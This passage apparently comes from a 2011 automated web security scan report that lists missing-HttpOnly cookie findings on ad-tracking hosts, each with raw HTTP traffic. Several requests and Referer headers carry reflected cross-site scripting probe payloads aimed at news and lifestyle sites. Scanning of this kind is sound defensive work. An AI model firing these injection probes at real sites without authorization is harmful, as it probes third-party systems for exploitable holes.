Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server


5.38. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.39. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.40. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.41. http://p.raasnet.com/partners/dfp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

5.42. http://p.raasnet.com/partners/oxmap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.43. http://p.raasnet.com/partners/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=155198643408292; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1784c8199cfe69ffd2e65a19; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.44. http://p.raasnet.com/partners/universal/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...

5.45. http://pixel.quantserve.com/api/segments.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EH0BGgHYB7vR0b2IHh2EsRA; expires=Sun, 11-Dec-2011 13:07:51 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Mon, 12 Sep 2011 13:17:51 GMT
Content-Length: 39
Date: Mon, 12 Sep 2011 13:07:51 GMT
Server: QS

qcCallback({"segments":[{"id":"D"}]});

5.46. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=403227748;fpan=1;fpa=P0-1895254174-1315850535699;ns=0;url=http%3A%2F%2Fwww.popsugar.com%2Fajaxharness1274b%2522-alert(document.location)-%2522faa5baba69b%3Fharness_requests%3D%257B%2522replacements%2522%253A%2520%255B%257B%2522sugar-menu-subnav-items%2522%253A%2520%2522%252Fsugar-subnav-items%253Ffastcache%253D1%2526fg_locale%253D0%2522%257D%252C%2520%257B%2522user-feedback-div%2522%253A%2520%2522%252Fsugar-user-feedback-form%253Fissue%253Dinfinite%252520scroll%2522%257D%255D%252C%2520%2522callbacks%2522%253A%2520%255B%255D%257D;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=site_name.PopSugar;dst=1;et=1315850535698;tzo=300;a=p-36POJYHTosuxU HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EAkBHwHXB4GxBprRW9iBACyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMMBGAHYB7vR0b2IENhCEA; expires=Sun, 11-Dec-2011 13:01:57 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 12 Sep 2011 13:01:57 GMT
Server: QS


5.47. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6432&rnd1315831249 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
